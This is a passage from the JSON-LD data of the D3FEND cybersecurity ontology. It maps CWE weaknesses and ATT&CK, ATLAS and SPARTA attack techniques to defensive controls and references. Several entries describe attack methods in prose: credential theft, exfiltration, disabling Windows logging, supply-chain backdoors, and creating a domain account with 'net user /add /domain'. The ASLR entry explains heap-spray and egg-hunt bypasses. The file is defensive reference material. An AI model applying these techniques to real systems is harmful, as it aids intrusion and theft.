      "d3f:cwe-id": "CWE-1302",
      "d3f:definition": "The product implements a security identifier mechanism to differentiate what actions are allowed or disallowed when a transaction originates from an entity. A transaction is sent without a security identifier.",
      "rdfs:label": [
        "Missing Security Identifier",
        "Missing Source Identifier in Entity Transactions on a System-On-Chip (SOC)"
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1294"
      }
    },
    {
      "@id": "d3f:Reference-Finding_phishing_sites",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US8839418B2/"
      },
      "d3f:kb-author": "Geoffrey John Hulten, Paul Stephen Rehfuss, Robert Rounthwaite, Joshua Theodore Goodman, Gopalakrishnan Seshadrinathan, Anthony P. Penta, Manav Mishra, Roderic C. Deyo, Elliott Jeb Haber, David Aaron Ward Snelling",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:DomainNameReputationAnalysis"
        },
        {
          "@id": "d3f:IPReputationAnalysis"
        },
        {
          "@id": "d3f:URLReputationAnalysis"
        }
      ],
      "d3f:kb-reference-title": "Finding phishing sites",
      "rdfs:label": "Reference - Finding phishing sites"
    },
    {
      "@id": "d3f:CWE-1422",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1422",
      "d3f:definition": "A processor event or prediction may allow incorrect or stale data to be forwarded to transient operations, potentially exposing data over a covert channel.",
      "rdfs:label": "Exposure of Sensitive Information caused by Incorrect Data Forwarding during Transient Execution",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1420"
      }
    },
    {
      "@id": "d3f:T1199",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1199",
      "d3f:creates": {
        "@id": "d3f:LoginSession"
      },
      "d3f:definition": "Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.",
      "d3f:produces": {
        "@id": "d3f:IntranetNetworkTraffic"
      },
      "rdfs:label": "Trusted Relationship",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:InitialAccessTechnique"
        },
        {
          "@id": "_:N61967686f2704f9e93ffeb47e6f2f2b6"
        },
        {
          "@id": "_:Nb870d50782714559aa8c4e96f9a68fae"
        }
      ]
    },
    {
      "@id": "_:N61967686f2704f9e93ffeb47e6f2f2b6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:LoginSession"
      }
    },
    {
      "@id": "_:Nb870d50782714559aa8c4e96f9a68fae",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IntranetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:CCI-002463_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system provides data origin artifacts for internal name/address resolution queries.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:DomainTrustPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002463"
    },
    {
      "@id": "d3f:CCI-001555_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system uniquely identifies destination domains for information transfer.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:DomainTrustPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2010-05-11T00:00:00"
      },
      "rdfs:label": "CCI-001555"
    },
    {
      "@id": "d3f:IA-0001.01",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0001.01",
      "d3f:definition": "This technique targets what developers import and the tools that transform source into flight binaries. Methods include dependency confusion and typosquatting, poisoned container/base images, malicious IDE plugins, and compromised compilers, linkers, or build runners that subtly alter output. Because flight and ground stacks frequently reuse open-source RTOS components, crypto libraries, protocol parsers, and build scripts, an upstream change can deterministically reproduce a backdoor downstream. Attackers also seed private mirrors or caches so “trust-on-first-use” locks in tainted packages, or abuse CI secrets and environment variables to pivot further. Effects range from inserting covert handlers into command parsers, to weakening integrity checks in update paths, to embedding telemetry beacons that exfiltrate build metadata helpful for later stages.",
      "rdfs:label": "Software Dependencies & Development Tools - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0001/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:IA-0001"
      },
      "skos:prefLabel": "Software Dependencies & Development Tools"
    },
    {
      "@id": "d3f:CWE-1071",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1071",
      "d3f:definition": "The source code contains a block that does not contain any code, i.e., the block is empty.",
      "rdfs:label": "Empty Code Block",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1164"
      }
    },
    {
      "@id": "d3f:T1555.004",
      "@type": "owl:Class",
      "d3f:attack-id": "T1555.004",
      "d3f:definition": "Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)",
      "rdfs:label": "Windows Credential Manager",
      "rdfs:subClassOf": {
        "@id": "d3f:T1555"
      }
    },
    {
      "@id": "d3f:T1048.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1048.001",
      "d3f:definition": "Adversaries may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.",
      "d3f:produces": {
        "@id": "d3f:OutboundInternetEncryptedTraffic"
      },
      "rdfs:label": "Exfiltration Over Symmetric Encrypted Non-C2 Protocol",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1048"
        },
        {
          "@id": "_:N75c44c63115b414092e8b4379abbe533"
        }
      ]
    },
    {
      "@id": "_:N75c44c63115b414092e8b4379abbe533",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetEncryptedTraffic"
      }
    },
    {
      "@id": "d3f:CCI-001233_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization employs automated mechanisms on an organization-defined frequency to determine the state of information system components with regard to flaw remediation.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:SoftwareUpdate"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-22T00:00:00"
      },
      "rdfs:label": "CCI-001233"
    },
    {
      "@id": "d3f:T1151",
      "@type": "owl:Class",
      "d3f:attack-id": "T1151",
      "d3f:definition": "Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system. For example, if there is a Mach-O executable file called evil.bin, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to evil.txt, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to \"evil.txt \" (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed (Citation: Mac Backdoors are back).",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1036.006",
      "rdfs:label": "Space after Filename",
      "rdfs:seeAlso": {
        "@id": "d3f:T1036.006"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ExecutionTechnique"
        }
      ]
    },
    {
      "@id": "d3f:TA0110",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "rdfs:label": "Persistence - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Persistence"
    },
    {
      "@id": "d3f:T1562.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1562.002",
      "d3f:definition": "Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more.(Citation: Windows Log Events) This data is used by security tools and analysts to generate detections.",
      "d3f:may-modify": [
        {
          "@id": "d3f:ApplicationConfiguration"
        },
        {
          "@id": "d3f:OperatingSystemConfigurationComponent"
        }
      ],
      "rdfs:label": "Disable Windows Event Logging",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1562"
        },
        {
          "@id": "_:N835ee4c803d24d579e67e0003ad576d8"
        },
        {
          "@id": "_:N08a3625482654880b0ccc85aaf17e232"
        }
      ]
    },
    {
      "@id": "_:N835ee4c803d24d579e67e0003ad576d8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationConfiguration"
      }
    },
    {
      "@id": "_:N08a3625482654880b0ccc85aaf17e232",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystemConfigurationComponent"
      }
    },
    {
      "@id": "d3f:UseCaseGoal",
      "@type": "owl:Class",
      "rdfs:label": "Use Case Goal",
      "rdfs:subClassOf": {
        "@id": "d3f:Goal"
      }
    },
    {
      "@id": "d3f:CWE-1079",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1079",
      "d3f:definition": "A parent class contains one or more child classes, but the parent class does not have a virtual destructor method.",
      "rdfs:label": "Parent Class without Virtual Destructor Method",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1076"
      }
    },
    {
      "@id": "d3f:AML.T0048.004",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0048.004",
      "d3f:definition": "Adversaries may exfiltrate AI artifacts to steal intellectual property and cause economic harm to the victim organization.\n\nProprietary training data is costly to collect and annotate and may be a target for [Exfiltration](/tactics/AML.TA0010) and theft.\n\nAIaaS providers charge for use of their API.\nAn adversary who has stolen a model via [Exfiltration](/tactics/AML.TA0010) or via [Extract AI Model](/techniques/AML.T0024.002) now has unlimited use of that service without paying the owner of the intellectual property.",
      "rdfs:label": "AI Intellectual Property Theft - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0048.004"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0048"
      },
      "skos:prefLabel": "AI Intellectual Property Theft"
    },
    {
      "@id": "d3f:EXF-0009",
      "@type": "owl:Class",
      "d3f:attack-id": "EXF-0009",
      "d3f:definition": "The adversary leverages third-party infrastructure connected to the mission, commercial ground stations, relay networks, operations service providers, data processing partners, to capture or relay mission data outside official channels. From these footholds, the attacker can mirror TT&C and payload feeds, scrape shared repositories, and man-in-the-middle cross-organization links (e.g., between partner stations and the primary MOC). Because partner environments vary in segmentation and monitoring, exfiltration can affect multiple missions or operators simultaneously, with stolen data exiting through the partner’s routine distribution mechanisms.",
      "rdfs:label": "Compromised Partner Site - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EXF-0009/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAExfiltrationTechnique"
      },
      "skos:prefLabel": "Compromised Partner Site"
    },
    {
      "@id": "d3f:CWE-1122",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1122",
      "d3f:definition": "The code is structured in a way that a Halstead complexity measure exceeds a desirable maximum.",
      "rdfs:label": "Excessive Halstead Complexity",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1120"
      }
    },
    {
      "@id": "d3f:T1136.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1136.002",
      "d3f:creates": {
        "@id": "d3f:DomainUserAccount"
      },
      "d3f:definition": "Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the <code>net user /add /domain</code> command can be used to create a domain account.(Citation: Savill 1999)",
      "rdfs:label": "Domain Account",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1136"
        },
        {
          "@id": "_:N312b867064fb474bb0abed1112a85198"
        }
      ]
    },
    {
      "@id": "_:N312b867064fb474bb0abed1112a85198",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DomainUserAccount"
      }
    },
    {
      "@id": "d3f:CCI-002690_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:FileContentRules"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system distributes indicators of compromise.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002690"
    },
    {
      "@id": "d3f:CWE-830",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-830",
      "d3f:definition": "The product includes web functionality (such as a web widget) from another domain, which causes it to operate within the domain of the product, potentially granting total access and control of the product to the untrusted source.",
      "rdfs:label": "Inclusion of Web Functionality from an Untrusted Source",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-829"
      }
    },
    {
      "@id": "d3f:M1015",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:d3fend-comment": "M1015 scope is broad, touches on an wide variety of techniques in D3FEND.",
      "d3f:related": [
        {
          "@id": "d3f:AuthenticationCacheInvalidation"
        },
        {
          "@id": "d3f:DomainTrustPolicy"
        },
        {
          "@id": "d3f:UserAccountPermissions"
        }
      ],
      "rdfs:label": "Active Directory Configuration"
    },
    {
      "@id": "d3f:T0800",
      "@type": "owl:Class",
      "d3f:attack-id": "T0800",
      "d3f:definition": "Adversaries may activate firmware update mode on devices to prevent expected response functions from engaging in reaction to an emergency or process malfunction. For example, devices such as protection relays may have an operation mode designed for firmware installation. This mode may halt process monitoring and related functions to allow new firmware to be loaded. A device left in update mode may be placed in an inactive holding state if no firmware is provided to it. By entering and leaving a device in this mode, the adversary may deny its usual functionalities.",
      "rdfs:label": "Activate Firmware Update Mode - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSInhibitResponseFunctionTechnique"
      },
      "skos:prefLabel": "Activate Firmware Update Mode"
    },
    {
      "@id": "d3f:T1546.016",
      "@type": "owl:Class",
      "d3f:attack-id": "T1546.016",
      "d3f:definition": "Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)",
      "rdfs:label": "Installer Packages",
      "rdfs:subClassOf": {
        "@id": "d3f:T1546"
      }
    },
    {
      "@id": "d3f:FileHashing",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:FileHashing"
      ],
      "d3f:d3fend-id": "D3-FH",
      "d3f:definition": "Employing file hash comparisons to detect known malware.",
      "d3f:kb-article": "## How it works\nThis technique requires a list of hashes to compare a file against.\n\n## Considerations\nPerformance on large files or very large numbers of files.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-Munin"
      },
      "rdfs:label": "File Hashing",
      "rdfs:subClassOf": {
        "@id": "d3f:FileAnalysis"
      }
    },
    {
      "@id": "d3f:LinuxELFFile64bit",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExecutableBinary"
      ],
      "rdfs:label": "Linux ELF File 64bit"
    },
    {
      "@id": "d3f:SegmentAddressOffsetRandomization",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SegmentAddressOffsetRandomization"
      ],
      "d3f:d3fend-id": "D3-SAOR",
      "d3f:definition": "Randomizing the base (start) address of one or more segments of memory during the initialization of a process.",
      "d3f:kb-article": "## How it works\n\nMany application exploits rely on an attacker specifying a location in memory, which points to data or code used by the attacker.  If the addresses are changed each time the program is run, then it becomes more difficult for the attacker to determine the location that will contain the code they wish to run.\n\nImported modules may be similarly realigned if their default memory addresses conflict with other modules, in a process known as \"rebasing.\"  Just as not all code is built for participation in ASLR, not all modules can be rebased; instead, modules must indicate whether they implement support for rebasing.  Such information to relocate the executable is typically stored in the \".reloc\" segment -- each of the addresses pointed to in this segment has its address increased by the amount of the offset.\n(An alternative method for relocation would be to add an amount to a global variable each time -- leading to less overhead in the module load, but more for each access.  Still another implementation could instead contain code to deference each changeable memory location on the fly, so that each of the references do not need to be updated.\n\n\n## Considerations\n\nAs the offset for each segment is constant, it is possible to guess at the value of the address given the address of another variable.  Alternatively, memory pointers may be kept around, which contain the address of another variable.\nAnother bypass technique is known as an \"egg hunt,\" whereby the attacker searches for a rather unique piece of the data or code in memory to determine its likely address.\n\nThe program needs to store these addresses for the functions somewhere.  In Linux, the PLT contains a \"trampoline\" to these addresses.  
If an attacker desires to jump to the start of an existing function, they can jump directly to the trampoline anyway, and may have the opportunity to provide their own stack frame to the function with a write to the stack. If they overwrite a saved stack pointer which is loaded back into memory, or execute a function, that changes the address of a stack pointer.\n\nIf an attacker wants to inject some data into the program, for example as a parameter to a known function that is not under ASLR or a pointer to a trampoline function in the PLT, then they can repeat the data until they exceed the range of ASLR coverage, which on 32-bit systems is accomplishable in a few seconds with a heap spray.  Microsoft's EMET and Windows 10 Exploit Guard can pre-allocate particular addresses that are commonly used in heap sprays.  However, in many products, there does not seem to be nearly a complete coverage of such addresses, which only need to be executable and in the range of the heap; 0x0c0c0c0c is such an address that is commonly used for the x86 processor architecture, as when executed it only performs a numeric operation to a register four times.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-DYNAMICBASE_UseAddressSpaceLayoutRandomization_MicrosoftDocs"
        },
        {
          "@id": "d3f:Reference-HowASLRProtectsLinuxSystemsFromBufferOverflowAttacks_NetworkWorld"
        }
      ],
      "d3f:obfuscates": {
        "@id": "d3f:ProcessSegment"
      },
      "d3f:synonym": [
        "ASLR",
        "Address Space Layout Randomization"
      ],
      "rdfs:label": "Segment Address Offset Randomization",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationHardening"
        },
        {
          "@id": "_:Nac67f6215d8b4fe890bdab18721ef6b9"
        }
      ]
    },
    {
      "@id": "_:Nac67f6215d8b4fe890bdab18721ef6b9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:obfuscates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessSegment"
      }
    },
    {
      "@id": "d3f:resume",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x resume y: The agent or technique x continues a previous action on entity y. Usually occurs after suspension on y.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/00350758-v"
      },
      "rdfs:label": "resume",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-process-object-property"
      }
    },
    {
      "@id": "d3f:CCI-002743_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:SenderMTAReputationAnalysis"
        },
        {
          "@id": "d3f:SenderReputationAnalysis"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements spam protection mechanisms with a learning capability to more effectively identify legitimate communications traffic.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002743"
    },
    {
      "@id": "d3f:CCI-002403_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system only allows incoming communications from organization-defined authorized sources routed to organization-defined authorized destinations.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002403"
    },
    {
      "@id": "d3f:T1406.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1406.001",
      "d3f:definition": "Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files.",
      "rdfs:label": "Steganography - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1406"
      },
      "skos:prefLabel": "Steganography"
    },
    {
      "@id": "d3f:WindowsRegistryValueEvent",
      "@type": "owl:Class",
      "d3f:definition": "Events representing actions performed on Windows Registry values, which store configuration data within registry keys.",
      "rdfs:label": "Windows Registry Value Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/win/registry_value_activity"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:WindowsRegistryEvent"
        },
        {
          "@id": "_:Nd2f6070c8ac540438ffbb2e5a341302b"
        }
      ]
    },
    {
      "@id": "_:Nd2f6070c8ac540438ffbb2e5a341302b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsRegistryValue"
      }
    },
    {
      "@id": "d3f:Reference-TRITONMalwareRemainsThreattoGlobalCriticalInfrastructureICS",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.ic3.gov/CSA/2022/220325.pdf"
      },
      "d3f:kb-abstract": "The FBI is warning that the group responsible for the deployment of TRITON malware against a Middle East-based petrochemical plant's safety instrumented system in 2017, the Russian Central Scientific Research Institute of Chemistry and Mechanics (TsNIIKhM), continues to conduct activity targeting the global energy sector. This warning follows the 24 March 2022 unsealing of a US indictment of a Russian national and TsNIIKhM employee involved in that attack. TRITON was malware designed to cause physical safety systems to cease operating or to operate in an unsafe manner. Its potential impact could be similar to cyberattacks previously attributed to Russia that caused blackouts in Ukraine in 2015 and 2016.\n\nTRITON malware targeted the Schneider Electric Triconex safety instrumented system (SIS), which is used to initiate safe shutdown procedures in the event of an emergency. TRITON malware affected Triconex Tricon safety controllers by modifying in-memory firmware to add additional programming, potentially leading to damage of a facility, system downtime, and even loss of life should the SIS fail to initiate safe shutdown procedures. Schneider Electric addressed the vulnerability (with the Tricon model 3008 v10.0-10.4) when version 11.3 of the Tricon controller was released in June 2018; however, older versions of the controller remain in use and are vulnerable to a similar attack. As a result, the FBI is alerting the ICS community of continued activity by this group and requests that any indicators of potential compromise be reported to the FBI.",
      "d3f:kb-author": "FBI",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:OperatingModeMonitoring"
        },
        {
          "@id": "d3f:OperatingModeRestriction"
        }
      ],
      "d3f:kb-reference-title": "TRITON Malware Remains Threat to Global Critical Infrastructure Industrial Control Systems (ICS)",
      "rdfs:label": "Reference - TRITON Malware Remains Threat to Global Critical Infrastructure Industrial Control Systems (ICS)"
    },
    {
      "@id": "d3f:has-contribution",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "has-contribution",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-kb-object-property"
      }
    },
    {
      "@id": "d3f:DataArtifactServer",
      "@type": "owl:Class",
      "d3f:definition": "A data artifact server provides access services to content in a content repository.  The content repository or content store is a database of digital content with an associated set of data management, search and access methods allowing application-independent access to the content, rather like a digital library, but with the ability to store and modify content in addition to searching and retrieving. The content repository acts as the storage engine for a larger application such as a content management system or a document management system, which adds a user interface on top of the repository's application programming interface.",
      "rdfs:label": "Data Artifact Server",
      "rdfs:seeAlso": {
        "@id": "dbr:Content_repository"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ArtifactServer"
      }
    },
    {
      "@id": "d3f:RegOpenKeyExA",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GetSystemConfigValue"
      ],
      "rdfs:label": "RegOpenKeyExA"
    },
    {
      "@id": "d3f:MessageEncryption",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:MessageEncryption"
      ],
      "d3f:d3fend-id": "D3-MENCR",
      "d3f:definition": "Encrypting a message body using a cryptographic key.",
      "d3f:encrypts": {
        "@id": "d3f:DigitalMessage"
      },
      "d3f:kb-article": "## How it works\n\n### Asymmetric Cryptography\nAsymmetric encryption is typically accomplished using public and private key certificates based on the X.509 standard. The sender encrypts messages using the recipient's public key and the recipient decrypts the message using their private key. Standards that can be used to implement user message encryption include S/MIME (Secure/Multipurpose Internet Mail Extensions) and PGP.\n\n### Symmetric Cryptography\nIn symmetric encryption, the sender and receiver use the same cryptographic key to encrypt and decrypt a message. Asymmetric key exchange protocols such as Diffie-Hellman can be used to share the cryptographic key with the recipient. For synchronous or low-latency environments (like a message bus), a pre-shared or dynamically derived symmetric key is typically used to minimize computational overhead.\n\n## Considerations\n- Separate configuration settings to enable message encryption are often needed for each messenger client (e.g. webmail, desktop client, mobile).\n- Continuous monitoring to ensure private keys are not compromised and the certificate authority (CA) is trusted.\n- Secure transfer of private keys between multiple devices.\n- Encryption adds latency and increases CPU utilization; while negligible for user-to-user messages, it can be a critical factor for real-time bus systems.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-SecureMultipurposeInternetMailExtensionsMIME-Version3.1"
      },
      "rdfs:label": "Message Encryption",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:MessageHardening"
        },
        {
          "@id": "_:N19cca0dcc3c44b40b6e568c7fc9f7e15"
        }
      ]
    },
    {
      "@id": "_:N19cca0dcc3c44b40b6e568c7fc9f7e15",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:encrypts"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DigitalMessage"
      }
    },
    {
      "@id": "d3f:LinuxMmap2",
      "@type": "owl:Class",
      "d3f:definition": "Map files or devices into memory.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/mmap2.2.html"
      },
      "rdfs:label": "Linux Mmap2",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIAllocateMemory"
      }
    },
    {
      "@id": "d3f:ObjectEviction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ObjectEviction"
      ],
      "d3f:d3fend-id": "D3-OE",
      "d3f:definition": "Terminate or remove an object from a host machine. This is the broadest class for object eviction.",
      "d3f:enables": {
        "@id": "d3f:Evict"
      },
      "rdfs:label": "Object Eviction",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:Nf2213404610c4571a4d471bff909a004"
        }
      ]
    },
    {
      "@id": "_:Nf2213404610c4571a4d471bff909a004",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Evict"
      }
    },
    {
      "@id": "d3f:OSAPIResumeThread",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that resumes the execution of a paused, stopped, or suspended thread.",
      "d3f:invokes": {
        "@id": "d3f:ResumeThread"
      },
      "rdfs:label": "OS API Resume Thread",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:N19ff1e4cf49747ceb569ce76814dd665"
        }
      ]
    },
    {
      "@id": "_:N19ff1e4cf49747ceb569ce76814dd665",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ResumeThread"
      }
    },
    {
      "@id": "d3f:TunnelEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving the establishment, usage, or termination of a network tunnel. Tunnels provide encapsulated communication pathways across various layers, enabling secure, isolated, or virtualized transport of data.",
      "rdfs:label": "Tunnel Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/tunnel_activity"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkEvent"
      }
    },
    {
      "@id": "d3f:CWE-1240",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1240",
      "d3f:definition": "To fulfill the need for a cryptographic primitive, the product implements a cryptographic algorithm using a non-standard, unproven, or disallowed/non-compliant cryptographic implementation.",
      "rdfs:label": "Use of a Cryptographic Primitive with a Risky Implementation",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-327"
      }
    },
    {
      "@id": "d3f:ProcessStartFunction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A function that creates a new computer process, usually by invoking a create process system call.",
      "d3f:invokes": {
        "@id": "d3f:CreateProcess"
      },
